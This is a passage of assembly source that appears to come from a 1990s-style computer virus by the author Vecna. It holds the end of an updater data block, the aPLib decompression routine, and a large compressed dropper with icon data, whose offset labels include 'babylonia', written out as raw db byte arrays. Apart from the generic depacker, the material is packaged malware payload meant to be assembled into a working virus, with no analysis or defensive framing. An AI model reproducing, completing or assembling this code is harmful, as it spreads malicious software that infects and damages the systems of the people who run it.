db 042h, 0A4h, 0F1h, 0E8h, 0DBh, 090h, 0A5h, 003h
db 046h, 013h, 0EBh, 0F6h, 0BFh, 023h, 03Fh, 0A1h
db 084h, 04Eh, 0ABh, 0CAh, 004h, 006h, 006h, 04Fh
db 0E8h, 0BFh, 039h, 010h, 073h, 003h, 0A4h, 05Ch
db 03Ch, 07Eh, 0A0h, 07Eh, 03Bh, 035h, 044h, 054h
db 061h, 049h, 0C3h, 071h, 04Ch, 011h, 014h, 015h
db 064h, 077h, 04Ah, 04Fh, 0C5h, 08Bh, 041h, 024h
db 008h, 0EBh, 01Dh, 036h, 04Ah, 083h, 06Ah, 0F0h
db 058h, 0F8h, 003h, 040h, 028h, 073h, 08Bh, 005h
db 008h, 081h, 048h, 020h, 080h, 013h, 09Ah, 029h
db 035h, 0B0h, 074h, 036h, 002h, 08Bh, 00Dh, 060h
db 044h, 075h, 0E3h, 06Bh, 0FFh, 0D1h, 037h, 0A3h
db 048h, 013h, 041h, 074h, 066h, 0C7h, 063h, 0FDh
db 02Eh, 028h, 018h, 052h, 08Ah, 0D2h, 018h, 032h
db 0C2h, 070h, 0C6h, 00Fh, 031h, 074h, 047h, 0FCh
db 0BFh, 0A4h, 081h, 017h, 0F2h, 0AEh, 0FDh, 0B0h
db 05Ch, 080h, 00Ah, 0FCh, 08Bh, 047h, 002h, 00Dh
db 020h, 0C1h, 003h, 03Dh, 072h, 06Eh, 061h, 0C4h
db 074h, 013h, 0A7h, 033h, 0BFh, 0C4h, 0EBh, 052h
db 0CBh, 00Eh, 048h, 0AEh, 0D6h, 00Ah, 07Ah, 0FCh
db 0C4h, 01Eh, 0C3h, 0D4h, 05Ch, 006h, 04Ch, 09Bh
db 011h, 0D1h, 020h, 058h, 0DAh, 0C6h, 0E8h, 082h
db 03Bh, 0A4h, 011h, 011h, 02Eh, 068h, 0D6h, 03Bh
db 050h, 02Ah, 0FEh, 006h, 043h, 0EFh, 010h, 01Dh
db 021h, 088h, 00Ch, 064h, 02Ch, 020h, 0BFh, 0C3h
db 015h, 0C5h, 0C1h, 0D7h, 0A3h, 015h, 0F5h, 007h
db 023h, 068h, 011h, 06Ch, 088h, 070h, 0C4h, 074h
db 062h, 044h, 029h, 013h, 05Eh, 0D8h, 025h, 0E0h
db 030h, 0DDh, 023h, 095h, 0E4h, 006h, 021h, 0E8h
db 090h, 0ECh, 0C8h, 0F0h, 064h, 0F4h, 032h, 0F8h
db 019h, 0FCh, 00Dh, 0C1h, 031h, 008h, 004h, 086h
db 043h, 008h, 021h, 00Ch, 090h, 010h, 0C8h, 014h
db 064h, 018h, 032h, 020h, 019h, 024h, 00Ch, 028h
db 086h, 043h, 02Ch, 021h, 030h, 090h, 034h, 0C8h
db 038h, 064h, 03Ch, 032h, 044h, 019h, 04Ch, 00Ch
db 050h, 086h, 045h, 054h, 05Eh, 001h, 0FBh, 0C1h
db 02Fh, 076h, 065h, 063h, 061h, 021h, 082h, 00Ch
db 069h, 072h, 075h, 073h, 0E1h, 004h, 078h, 0CBh
db 087h, 060h, 06Fh, 06Bh, 034h, 065h, 0DFh, 02Ah
db 0FEh, 0AEh, 07Ah, 079h, 03Ch, 075h, 0C5h, 007h
db 06Ah, 070h, 0C7h, 0A5h, 0B0h, 066h, 074h, 077h
db 061h, 07Fh, 072h, 00Eh, 05Ch, 04Dh, 069h, 063h
db 0DFh, 01Bh, 073h, 01Dh, 0D3h, 057h, 0D1h, 06Eh
db 064h, 0E9h, 077h, 0EFh, 0C0h, 043h, 075h, 072h
db 0D7h, 030h, 00Dh, 090h, 056h, 062h, 0F1h, 069h
db 007h, 0F7h, 052h, 0FFh, 097h, 017h, 01Ch, 020h
db 0BAh, 02Fh, 031h, 02Eh, 0E5h, 070h, 08Fh, 055h
db 061h, 073h, 030h, 02Dh, 041h, 067h, 080h, 043h
db 03Ah, 020h, 04Dh, 06Fh, 07Ah, 069h, 071h, 06Ch
db 0C3h, 0D6h, 034h, 02Eh, 030h, 0E1h, 028h, 063h
db 0F4h, 06Dh, 070h, 0B0h, 096h, 007h, 069h, 062h
db 06Ch, 065h, 03Bh, 0D5h, 056h, 023h, 082h, 029h
db 0BEh, 05Ch, 078h, 041h, 0F3h, 0FDh, 070h, 08Fh
db 055h, 069h, 06Dh, 0F9h, 066h, 02Fh, 0CFh, 0B9h
db 066h, 02Ch, 04Ch, 00Bh, 078h, 072h, 02Dh, 07Eh
db 062h, 040h, 074h, 070h, 0ACh, 011h, 0A3h, 094h
db 0A7h, 06Ch, 018h, 02Ah, 0F1h, 0CBh, 028h, 06Ah
db 048h, 090h, 0DCh, 067h, 001h, 05Ch, 04Bh, 045h
db 052h, 04Eh, 0CCh, 04Ch, 033h, 03Ch, 032h, 02Eh
db 03Dh, 058h, 070h, 051h, 043h, 094h, 0B9h, 0BCh
db 09Ch, 054h, 06Fh, 04Fh, 06Ch, 068h, 03Ch, 0D9h
db 070h, 02Ah, 053h, 0BBh, 0C2h, 03Dh, 073h, 0FFh
db 0A1h, 0DEh, 050h, 046h, 0BFh, 0C8h, 0F5h, 0EFh
db 028h, 024h, 046h, 0F1h, 0EFh, 04Bh, 00Fh, 03Bh
db 04Eh, 054h, 0FBh, 047h, 0F7h, 0D2h, 082h, 0A5h
db 064h, 075h, 082h, 094h, 048h, 061h, 08Ch, 0DDh
db 00Ch, 041h, 0A2h, 011h, 08Fh, 022h, 03Fh, 07Fh
db 076h, 0DCh, 04Dh, 019h, 052h, 0EAh, 069h, 0A8h
db 06Ah, 0D2h, 069h, 053h, 006h, 00Dh, 030h, 070h
db 04Dh, 03Dh, 033h, 000h, 0FFh, 085h, 064h, 030h
db 028h, 00Ch, 05Ch, 040h, 031h, 0E0h, 0CAh, 021h
db 0A4h, 014h, 059h, 069h, 013h, 020h, 029h, 009h
db 0C8h, 014h, 064h, 075h, 048h, 044h, 090h, 0D0h
db 0F2h, 080h, 024h, 04Ch, 054h, 001h, 0B8h, 08Eh
db 0CCh, 031h, 0A4h, 009h, 0AEh, 089h, 0C4h, 012h
db 0D0h, 024h, 0E6h, 048h, 0FCh, 088h, 010h, 032h
db 011h, 01Eh, 022h, 02Eh, 044h, 03Eh, 04Ch, 089h
db 05Eh, 012h, 066h, 024h, 076h, 054h, 001h, 033h
db 084h, 011h, 08Eh, 022h, 009h, 096h, 044h, 09Eh
db 0ACh, 089h, 0BAh, 012h, 0CCh, 025h, 0D6h, 032h
db 024h, 0E4h, 099h, 008h, 0F4h, 011h, 006h, 033h
db 003h, 018h, 0A5h, 02Ah, 07Ch, 0A9h, 032h, 093h
db 0D3h, 01Ch, 04Dh, 078h, 002h, 057h, 053h, 04Fh
db 043h, 04Bh, 099h, 00Ch, 055h, 0F3h, 053h, 034h
db 00Bh, 00Eh, 041h, 044h, 056h, 065h, 050h, 049h
db 036h, 00Dh, 003h, 09Ah, 073h, 026h, 053h, 079h
db 065h, 089h, 06Dh, 044h, 08Bh, 0A1h, 00Fh, 018h
db 08Eh, 06Fh, 0BFh, 06Fh, 02Bh, 0FFh, 023h, 06Eh
db 045h, 078h, 066h, 01Eh, 015h, 053h, 040h, 098h
db 0BBh, 09Ah, 09Ch, 0EDh, 0DDh, 072h, 060h, 03Eh
db 075h, 0CBh, 050h, 073h, 0E4h, 01Eh, 00Ah, 043h
db 06Fh, 070h, 079h, 017h, 0A8h, 02Ch, 0C9h, 032h
db 074h, 091h, 09Ch, 066h, 098h, 021h, 053h, 04Dh
db 06Eh, 067h, 0D3h, 02Dh, 039h, 0DCh, 040h, 027h
db 04Eh, 061h, 06Dh, 0AAh, 02Bh, 065h, 0F2h, 0CAh
db 04Ch, 03Fh, 058h, 052h, 053h, 010h, 052h, 070h
db 01Bh, 045h, 072h, 09Ah, 09Eh, 04Fh, 0A3h, 00Fh
db 080h, 049h, 073h, 042h, 07Ah, 061h, 0A4h, 063h
db 0DAh, 0B8h, 021h, 08Dh, 097h, 016h, 063h, 009h
db 096h, 07Dh, 031h, 046h, 040h, 08Ch, 0B0h, 0D4h
db 0CAh, 011h, 056h, 0CFh, 007h, 074h, 075h, 061h
db 0D5h, 041h, 01Bh, 0E6h, 03Eh, 085h, 028h, 010h
db 046h, 0D4h, 050h, 057h, 033h, 073h, 02Ah, 06Bh
db 051h, 076h, 018h, 0B5h, 0F6h, 0F2h, 015h, 008h
db 0FDh, 028h, 076h, 008h, 0EDh, 049h, 08Eh, 05Dh
db 01Fh, 020h, 045h, 041h, 0A1h, 0D3h, 061h, 0B5h
db 075h, 0A6h, 026h, 00Eh, 0E3h, 015h, 04Ch, 061h
db 073h, 0A3h, 094h, 02Eh, 05Ch, 083h, 071h, 075h
db 065h, 0A6h, 02Ah, 0A2h, 0C9h, 0E3h, 005h, 0FDh
db 023h, 02Ah, 050h, 015h, 0CCh, 06Bh, 04Dh, 092h
db 05Ch, 03Ch, 056h, 0E4h, 059h, 0CAh, 054h, 0D9h
db 056h, 0A1h, 080h, 075h, 0E6h, 08Ah, 0C1h, 012h
db 0CBh, 0B1h, 035h, 04Bh, 0E5h, 079h, 0A9h, 027h
db 012h, 0A8h, 07Dh, 0D2h, 023h, 0DBh, 000h, 0EEh
db 060h, 000h
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPDATER.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UNPACK.INC]ÄÄÄ
;***************************************************************
;* aPLib v0.22b - the smaller the better :) *
;* WASM & TASM assembler depacker *
;* *
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
;***************************************************************
_aP_depack_asm:
push ebp
mov ebp, esp
pushad
push ebp
mov esi, [ebp + 8] ; C calling convention
mov edi, [ebp + 12]
cld
mov dl, 80h
literal:
movsb
nexttag:
call getbit
jnc literal
xor ecx, ecx
call getbit
jnc codepair
xor eax, eax
call getbit
jnc shortmatch
mov al, 10h
getmorebits:
call getbit
adc al, al
jnc getmorebits
jnz domatch_with_inc
stosb
jmp short nexttag
codepair:
call getgamma_no_ecx
dec ecx
loop normalcodepair
mov eax,ebp
call getgamma
jmp short domatch
shortmatch:
lodsb
shr eax, 1
jz donedepacking
adc ecx, 2
mov ebp, eax
jmp short domatch
normalcodepair:
xchg eax, ecx
dec eax
shl eax, 8
lodsb
mov ebp, eax
call getgamma
cmp eax, 32000
jae domatch_with_2inc
cmp eax, 1280
jae domatch_with_inc
cmp eax, 7fh
ja domatch
domatch_with_2inc:
inc ecx
domatch_with_inc:
inc ecx
domatch:
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short nexttag
getbit:
add dl, dl
jnz stillbitsleft
mov dl, [esi]
inc esi
adc dl, dl
stillbitsleft:
ret
getgamma:
xor ecx, ecx
getgamma_no_ecx:
inc ecx
getgammaloop:
call getbit
adc ecx, ecx
call getbit
jc getgammaloop
ret
donedepacking:
pop ebp
sub edi, [ebp + 12]
mov [ebp - 4], edi ; return unpacked length in eax
popad
pop ebp
ret 4*2
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UNPACK.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DROPPER.INC]ÄÄÄ
;Compressed Dropper&Icon data
;(C) Vecna
dropper equ 0
coelho equ dropper+6144
hallwen equ coelho+1152
jesus equ hallwen+1152
ovo equ jesus+1152
santa equ ovo+1152
babylonia equ santa+1152
icon equ 12c8h
db 04Dh, 038h, 05Ah, 090h, 038h, 003h, 066h, 002h
db 004h, 009h, 071h, 0FFh, 081h, 0B8h, 0C2h, 091h
db 001h, 040h, 0C2h, 015h, 0C6h, 0C0h, 009h, 00Eh
db 0B4h, 04Ch, 0CDh, 021h, 015h, 001h, 0FAh, 0C6h
db 050h, 045h, 008h, 028h, 04Ch, 001h, 0BEh, 00Ah
db 0B0h, 0A2h, 00Ch, 038h, 014h, 0C7h, 0E0h, 001h
db 00Fh, 001h, 00Bh, 0C8h, 005h, 00Ch, 0E0h, 002h
db 0CAh, 01Bh, 012h, 015h, 065h, 010h, 032h, 004h
db 020h, 0BAh, 0DEh, 08Ch, 00Ch, 041h, 004h, 0A6h
db 01Fh, 0F1h, 05Dh, 051h, 04Ah, 00Dh, 02Bh, 002h
db 039h, 039h, 0D3h, 008h, 09Ah, 00Fh, 09Eh, 080h
db 065h, 05Ch, 0A1h, 050h, 031h, 053h, 060h, 009h
db 04Bh, 0D9h, 0BDh, 095h, 0B1h, 05Ch, 01Fh, 0ACh
db 02Eh, 01Ch, 074h, 065h, 078h, 0E2h, 038h, 0D6h
db 001h, 052h, 0CCh, 0D4h, 0C5h, 057h, 043h, 0C0h
db 060h, 02Eh, 072h, 064h, 061h, 072h, 074h, 080h
db 06Ah, 002h, 0AEh, 0FCh, 0A1h, 024h, 006h, 05Ah
db 028h, 055h, 0BBh, 0CDh, 02Eh, 049h, 027h, 0C1h
db 0A1h, 032h, 00Dh, 029h, 030h, 028h, 090h, 00Ah
db 0ACh, 0C0h, 0CEh, 0A0h, 073h, 04Eh, 063h, 015h
db 0ECh, 0CAh, 040h, 024h, 065h, 00Eh, 02Ah, 028h
db 070h, 0ADh, 001h, 0D7h, 061h, 0FCh, 0E8h, 0A0h
db 034h, 042h, 066h, 000h, 0BBh, 0C6h, 0CAh, 00Fh
db 0BAh, 0E0h, 01Fh, 073h, 060h, 004h, 014h, 0B1h
db 0ABh, 064h, 067h, 026h, 08Bh, 00Eh, 02Bh, 001h
db 0E3h, 002h, 0FFh, 0E1h, 0BEh, 031h, 00Bh, 020h
db 0CDh, 0B9h, 044h, 059h, 0F6h, 000h, 016h, 0ACh
db 0E2h, 0FBh, 0F7h, 0D3h, 066h, 089h, 031h, 01Dh
db 024h, 027h, 068h, 059h, 043h, 005h, 004h, 01Ah
db 075h, 0E8h, 04Fh, 00Ah, 093h, 00Ah, 0F9h, 05Dh
db 031h, 0BFh, 028h, 0ABh, 04Ch, 00Ah, 091h, 054h
db 07Fh, 070h, 095h, 0A7h, 01Eh, 090h, 03Ah, 0B2h
db 036h, 011h, 077h, 009h, 047h, 04Bh, 0F4h, 027h
db 027h, 0BCh, 01Fh, 06Ah, 076h, 010h, 0A3h, 074h
db 0DBh, 00Dh, 07Ch, 00Bh, 0C8h, 026h, 0CDh, 0BEh
db 028h, 0F4h, 01Dh, 075h, 00Bh, 087h, 011h, 01Ch
db 088h, 0B0h, 0B2h, 00Fh, 0B5h, 031h, 09Ch, 00Dh
db 091h, 013h, 09Fh, 0D5h, 00Dh, 023h, 0ECh, 0BCh
db 0ABh, 0D7h, 016h, 0BDh, 0B0h, 0D2h, 017h, 055h
db 08Bh, 0ECh, 003h, 083h, 0C4h, 0FCh, 068h, 061h
db 032h, 022h, 09Fh, 053h, 030h, 0E8h, 07Bh, 02Bh
db 089h, 045h, 0FCh, 0FEh, 074h, 011h, 023h, 068h
db 08Dh, 01Ah, 0E8h, 07Dh, 0F5h, 0A2h, 01Fh, 0FFh
db 075h, 041h, 024h, 064h, 08Fh, 01Bh, 085h, 0C0h
db 02Ah, 0E5h, 00Ch, 011h, 04Ch, 014h, 0C9h, 0C3h
db 04Bh, 0CAh, 07Bh, 06Ch, 071h, 014h, 04Eh, 00Dh
db 022h, 001h, 006h, 0CCh, 0FFh, 025h, 054h, 020h
db 085h, 0ECh, 050h, 0A9h, 006h, 04Ch, 00Ch, 048h
db 086h, 043h, 044h, 021h, 018h, 090h, 01Ch, 0DEh
db 0E1h, 090h, 024h, 0C8h, 028h, 064h, 014h, 032h
db 02Ch, 019h, 030h, 00Ch, 034h, 086h, 043h, 038h
db 021h, 03Ch, 090h, 00Ch, 0C8h, 008h, 064h, 004h
db 037h, 008h, 0A9h, 001h, 0D4h, 032h, 054h, 022h
db 008h, 046h, 024h, 036h, 048h, 02Ah, 0A8h, 001h
db 04Ah, 0AAh, 00Ch, 0D2h, 056h, 009h, 064h, 089h
db 070h, 012h, 082h, 024h, 092h, 048h, 0C0h, 091h
db 0D6h, 022h, 0E4h, 044h, 0FCh, 014h, 0A6h, 030h
db 044h, 03Eh, 030h, 089h, 028h, 012h, 01Ch, 024h
db 008h, 0B6h, 012h, 010h, 0F0h, 020h, 0E3h, 04Ah
db 032h, 029h, 044h, 021h, 0C0h, 096h, 014h, 066h
db 01Ch, 081h, 014h, 021h, 052h, 0ACh, 014h, 0C8h
db 060h, 0A8h, 0C2h, 0AFh, 0ACh, 05Ch, 050h, 0A0h
db 09Eh, 072h, 003h, 061h, 077h, 041h, 06Eh, 069h
db 06Dh, 0B0h, 074h, 065h, 064h, 073h, 052h, 076h
db 063h, 070h, 073h, 054h, 0A8h, 014h, 049h, 0F6h
db 06Fh, 067h, 06Eh, 040h, 0FBh, 001h, 047h, 065h
db 074h, 0FDh, 043h, 0C0h, 0BBh, 001h, 078h, 04Dh
db 071h, 073h, 03Eh, 061h, 067h, 084h, 042h, 06Fh
db 078h, 041h, 087h, 06Eh, 0ECh, 054h, 06Ch, 0F7h
db 0F9h, 073h, 0FBh, 00Fh, 035h, 055h, 053h, 045h
db 0A0h, 033h, 032h, 02Eh, 064h, 06Ch, 0E3h, 09Ch
db 05Ch, 075h, 03Eh, 000h, 078h, 069h, 074h, 050h
db 072h, 06Fh, 063h, 0DCh, 05Bh, 014h, 088h, 0B6h
db 07Dh, 00Fh, 06Eh, 064h, 043h, 06Ch, 0DBh, 050h
db 082h, 08Ch, 0ACh, 00Ch, 008h, 072h, 0F8h, 074h
db 0DBh, 00Ah, 076h, 070h, 086h, 054h, 091h, 012h
db 04Eh, 0F6h, 078h, 0A6h, 011h, 050h, 0E1h, 06Ah
db 043h, 038h, 075h, 072h, 0FCh, 06Dh, 06Eh, 0E2h
db 050h, 053h, 08Ah, 06Fh, 0E3h, 079h, 035h, 051h
db 0F9h, 031h, 027h, 023h, 06Eh, 0EEh, 072h, 0E5h
db 062h, 075h, 00Ch, 0A7h, 073h, 02Dh, 044h, 044h
db 001h, 053h, 06Fh, 079h, 09Ch, 0CAh, 06Dh, 02Dh
db 059h, 05Fh, 043h, 016h, 056h, 0F6h, 0CAh, 052h
db 069h, 0BCh, 028h, 064h, 00Eh, 06Fh, 057h, 0CBh
db 0A5h, 077h, 073h, 038h, 052h, 03Eh, 029h, 002h
db 053h, 06Ah, 079h, 073h, 0B7h, 030h, 0CCh, 0E7h
db 070h, 005h, 04Bh, 00Eh, 0D1h, 04Eh, 06Ah, 04Ch
db 0D4h, 051h, 018h, 040h, 046h, 050h, 069h, 078h
db 0EBh, 09Fh, 019h, 053h, 03Ch, 0F6h, 01Bh, 061h
db 079h, 04Dh, 020h, 0ADh, 024h, 091h, 096h, 082h
db 020h, 078h, 06Fh, 03Dh, 079h, 042h, 03Fh, 07Ah
db 06Ch, 0E8h, 01Ch, 099h, 0FCh, 053h, 0AEh, 02Ah
db 015h, 047h, 044h, 049h, 041h, 095h, 001h, 0AEh
db 0BCh, 0B3h, 001h, 090h, 09Eh, 09Bh, 09Ah, 08Dh
db 0DFh, 0BAh, 0CFh, 0A7h, 09Eh, 0C1h, 0FFh, 0BEh
db 0AFh, 0B6h, 0E9h, 091h, 0E1h, 08Bh, 0F9h, 099h
db 0F1h, 08Ah, 0DCh, 09Bh, 0DEh, 0FEh, 0A8h, 06Fh
db 096h, 00Ch, 0C7h, 088h, 08Ch, 0FDh, 04Ch, 0CCh
db 08Dh, 09Ah, 03Fh, 08Eh, 08Ah, 06Ch, 00Ah, 02Ah
db 0F2h, 01Eh, 0F5h, 0ABh, 097h, 073h, 026h, 08Fh
db 03Fh, 05Eh, 098h, 09Eh, 09Eh, 092h, 01Fh, 088h
db 01Ch, 093h, 07Eh, 09Eh, 09Dh, 09Ah, 01Bh, 08Bh
db 088h, 0EEh, 05Ch, 060h, 09Eh, 00Eh, 09Bh, 0D1h
db 0FFh, 0D5h, 0E6h, 0BAh, 072h, 0A7h, 0EDh, 0C2h
db 0BDh, 001h, 0F5h, 0C7h, 002h, 004h, 003h, 0E3h
db 07Fh, 011h, 080h, 00Eh, 035h, 038h, 011h, 068h
db 020h, 001h, 0E1h, 0CAh, 025h, 050h, 02Bh, 018h
db 05Ah, 04Ah, 0A4h, 068h, 018h, 056h, 02Bh, 009h
db 004h, 015h, 0EAh, 018h, 0E4h, 090h, 044h, 0A0h
db 040h, 005h, 0A8h, 008h, 028h, 01Ah, 048h, 065h
db 049h, 008h, 014h, 02Ch, 02Ah, 028h, 09Eh, 00Fh
db 0C5h, 040h, 054h, 036h, 029h, 085h, 080h, 004h
db 03Dh, 04Bh, 04Bh, 001h, 029h, 080h, 06Dh, 03Bh
db 0F8h, 0A4h, 007h, 0A3h, 002h, 036h, 013h, 0C0h
db 002h, 008h, 040h, 0DCh, 0F0h, 02Dh, 0CAh, 0A6h
db 00Eh, 093h, 03Ch, 019h, 099h, 009h, 066h, 012h
db 033h, 02Fh, 0E8h, 0CCh, 039h, 0C4h, 099h, 089h
db 066h, 012h, 033h, 02Eh, 011h, 07Eh, 06Eh, 099h
db 031h, 091h, 078h, 08Bh, 0E4h, 05Fh, 022h, 0FBh
db 017h, 0D8h, 0BAh, 045h, 0E2h, 02Fh, 091h, 07Ch
db 08Bh, 0E4h, 05Eh, 062h, 0FBh, 017h, 088h, 0BEh
db 045h, 0F2h, 02Ah, 014h, 038h, 045h, 0C2h, 02Eh
db 011h, 06Ch, 009h, 0E6h, 0CCh, 0DDh, 0BFh, 036h
db 097h, 008h, 047h, 066h, 022h, 033h, 0E1h, 016h
db 006h, 0DFh, 039h, 0E2h, 0FFh, 016h, 009h, 045h
db 033h, 0C2h, 02Ah, 08Ch, 03Eh, 0C5h, 0F6h, 02Fh
db 0B1h, 07Ch, 08Bh, 0F4h, 05Fh, 022h, 0F9h, 017h
db 0C8h, 0BEh, 045h, 0F2h, 02Fh, 0D1h, 07Ch, 08Bh
db 0E4h, 05Fh, 022h, 0F9h, 017h, 0C8h, 0BFh, 045h
db 049h, 08Ah, 0F2h, 0A6h, 002h, 099h, 009h, 044h
db 066h, 033h, 08Bh, 084h, 054h, 094h, 022h, 099h
db 0E9h, 017h, 088h, 0B2h, 008h, 033h, 02Eh, 011h
db 051h, 090h, 0F2h, 02Fh, 091h, 07Ch, 08Bh, 0E4h
db 05Fh, 022h, 0FDh, 017h, 0C8h, 0BEh, 045h, 0F2h
db 02Fh, 0B1h, 07Dh, 08Bh, 0F4h, 05Fh, 062h, 0FBh
db 017h, 0D8h, 0BEh, 045h, 0F2h, 02Fh, 0D1h, 07Ch
db 08Bh, 0E4h, 05Fh, 022h, 0F9h, 017h, 0C8h, 0B5h
db 031h, 037h, 08Ah, 0CAh, 002h, 099h, 066h, 009h
db 033h, 017h, 008h, 0A8h, 090h, 0FDh, 017h, 048h
db 0BCh, 045h, 0F2h, 02Fh, 091h, 07Ch, 08Bh, 0F4h
db 05Fh, 022h, 0F9h, 017h, 0C8h, 0BEh, 045h, 0F2h
db 02Fh, 0D1h, 07Ch, 08Bh, 0E4h, 05Fh, 022h, 0F9h
db 017h, 0C8h, 0BFh, 045h, 0F2h, 02Fh, 091h, 07Dh
db 08Bh, 0ECh, 05Fh, 062h, 0FDh, 017h, 0D8h, 0BEh
db 0C5h, 0F2h, 02Fh, 091h, 07Ch, 091h, 0A6h, 094h
db 0CCh, 08Ah, 0DFh, 02Ah, 002h, 06Eh, 033h, 009h
db 011h, 051h, 090h, 0EAh, 02Fh, 0D1h, 078h, 08Bh
db 0E4h, 05Fh, 022h, 0F9h, 017h, 0C8h, 0BFh, 045h
db 0F2h, 02Fh, 091h, 07Ch, 08Bh, 0E4h, 05Fh, 022h
db 0FDh, 017h, 0C8h, 0BEh, 045h, 0F2h, 02Fh, 091h
db 07Ch, 08Bh, 0F4h, 05Fh, 022h, 0F9h, 017h, 0C8h
db 0BEh, 045h, 0F2h, 02Fh, 0D1h, 07Ch, 08Bh, 0ECh
db 05Fh, 062h, 0FBh, 033h, 032h, 024h, 0CCh, 016h
db 06Fh, 0B4h, 08Eh, 0D4h, 002h, 070h, 0A2h, 014h
db 06Ch, 08Bh, 0E1h, 014h, 0C9h, 063h, 0A6h, 050h
db 027h, 0CEh, 011h, 069h, 028h, 033h, 0EBh, 084h
db 05Ah, 030h, 04Ch, 0AFh, 0E1h, 016h, 030h, 093h
db 073h, 038h, 045h, 0A4h, 030h, 037h, 0CEh, 011h
db 06Ah, 030h, 0E3h, 0CAh, 0FFh, 04Dh, 030h, 059h
db 0BFh, 0C2h, 02Dh, 026h, 059h, 083h, 0C2h, 02Dh
db 028h, 049h, 037h, 0C2h, 02Ah, 082h, 06Ch, 002h
db 0DDh, 0C8h, 009h, 0BBh, 091h, 0AAh, 022h, 088h
db 044h, 077h, 055h, 089h, 044h, 012h, 022h, 095h
db 01Fh, 04Dh, 002h, 0B6h, 01Eh, 002h, 02Eh, 0D5h
db 002h, 004h, 036h, 044h, 002h, 02Eh, 0DCh, 002h
db 010h, 011h, 057h, 02Bh, 096h, 00Ah, 0B4h, 0FBh
db 0E1h, 00Eh, 0A4h, 0A0h, 03Ch, 016h, 080h, 027h
db 0C9h, 00Fh, 095h, 003h, 049h, 091h, 052h, 007h
db 058h, 050h, 0D4h, 00Fh, 04Fh, 02Eh, 06Eh, 0C0h
db 0EAh, 0D6h, 0E9h, 0E8h, 0ADh, 0C0h, 002h, 0A7h
db 082h, 057h, 007h, 07Ch, 07Bh, 0ECh, 0FDh, 0B3h
db 020h, 002h, 0F5h, 087h, 028h, 09Dh, 0D9h, 0F0h
db 03Dh, 0D6h, 0ADh, 0E8h, 0E5h, 016h, 03Eh, 0C7h
db 006h, 0E9h, 0F0h, 0DCh, 036h, 0F1h, 0E9h, 0D7h
db 079h, 006h, 01Ch, 0F4h, 0F5h, 0DAh, 05Ch, 0D4h
db 069h, 020h, 029h, 001h, 09Eh, 0E9h, 0B3h, 077h
db 0F1h, 08Eh, 00Ah, 0E9h, 0BEh, 088h, 06Eh, 03Ch
db 047h, 0D5h, 0F3h, 01Dh, 041h, 0FEh, 0ACh, 03Eh
db 00Ah, 082h, 0E3h, 0BDh, 082h, 0B6h, 0CFh, 04Ah
db 006h, 0F9h, 0B7h, 064h, 0E4h, 04Dh, 082h, 049h
db 040h, 0F7h, 065h, 0F1h, 036h, 0EFh, 019h, 083h
db 04Ah, 0F0h, 0BBh, 00Eh, 06Dh, 0F9h, 084h, 0BFh
db 086h, 099h, 0AEh, 0F3h, 082h, 0F4h, 0D2h, 0B3h
db 020h, 076h, 002h, 0F1h, 049h, 0A9h, 04Bh, 0B2h
db 050h, 08Ah, 0E6h, 0CAh, 03Eh, 0D4h, 020h, 04Ch
db 03Dh, 07Ch, 072h, 05Dh, 0CEh, 00Bh, 051h, 02Ch
db 057h, 00Eh, 0A7h, 0E9h, 0FDh, 0E9h, 08Ch, 0D4h
db 0CFh, 0B3h, 0E4h, 0F3h, 051h, 0D5h, 020h, 0F6h
db 0A0h, 040h, 07Ch, 057h, 051h, 007h, 0A3h, 0DEh
db 098h, 0F6h, 032h, 02Bh, 07Ah, 05Dh, 0E7h, 0B1h
db 021h, 044h, 0E9h, 0AEh, 094h, 03Eh, 0F4h, 020h
db 06Dh, 01Ah, 026h, 0C7h, 072h, 039h, 06Eh, 02Bh
db 03Ah, 072h, 01Dh, 032h, 05Fh, 0A7h, 0F9h, 055h
db 084h, 057h, 0EEh, 02Dh, 042h, 0C2h, 0ADh, 020h
db 0ACh, 0CBh, 028h, 047h, 007h, 01Eh, 071h, 0EBh
db 0CDh, 07Ch, 0CFh, 03Eh, 047h, 0AEh, 069h, 025h
db 011h, 0DAh, 00Fh, 060h, 0E8h, 054h, 041h, 036h
db 0F7h, 004h, 04Ah, 0DEh, 0BEh, 075h, 020h, 00Eh
db 0A9h, 0F1h, 034h, 020h, 06Fh, 04Eh, 046h, 0B2h
db 0DAh, 081h, 0EDh, 0AAh, 0F9h, 001h, 0A3h, 0A3h
db 096h, 0B4h, 048h, 0CFh, 011h, 092h, 04Ah, 063h
db 0ADh, 0A6h, 031h, 080h, 0A6h, 0F5h, 056h, 020h
db 07Ch, 050h, 007h, 0B9h, 032h, 0DDh, 006h, 0F6h
db 055h, 090h, 091h, 02Fh, 036h, 044h, 014h, 0ABh
db 0A3h, 0FDh, 05Bh, 020h, 070h, 073h, 0BBh, 0A2h
db 09Dh, 08Dh, 0C0h, 0A8h, 0E8h, 0EBh, 0F6h, 0F9h
db 043h, 0CFh, 051h, 0FEh, 012h, 0A1h, 00Eh, 058h
db 053h, 060h, 07Ch, 054h, 07Ch, 0BBh, 0F6h, 0E3h
db 047h, 09Fh, 06Dh, 0C4h, 0EEh, 08Dh, 0C4h, 046h
db 0CBh, 050h, 038h, 0EFh, 0F7h, 0A9h, 091h, 0CEh
db 046h, 020h, 0BCh, 037h, 032h, 0EBh, 02Bh, 01Dh
db 031h, 0EAh, 0A6h, 0CCh, 0F7h, 00Eh, 0FDh, 0A9h
db 088h, 0CEh, 033h, 0E2h, 081h, 06Ah, 041h, 024h
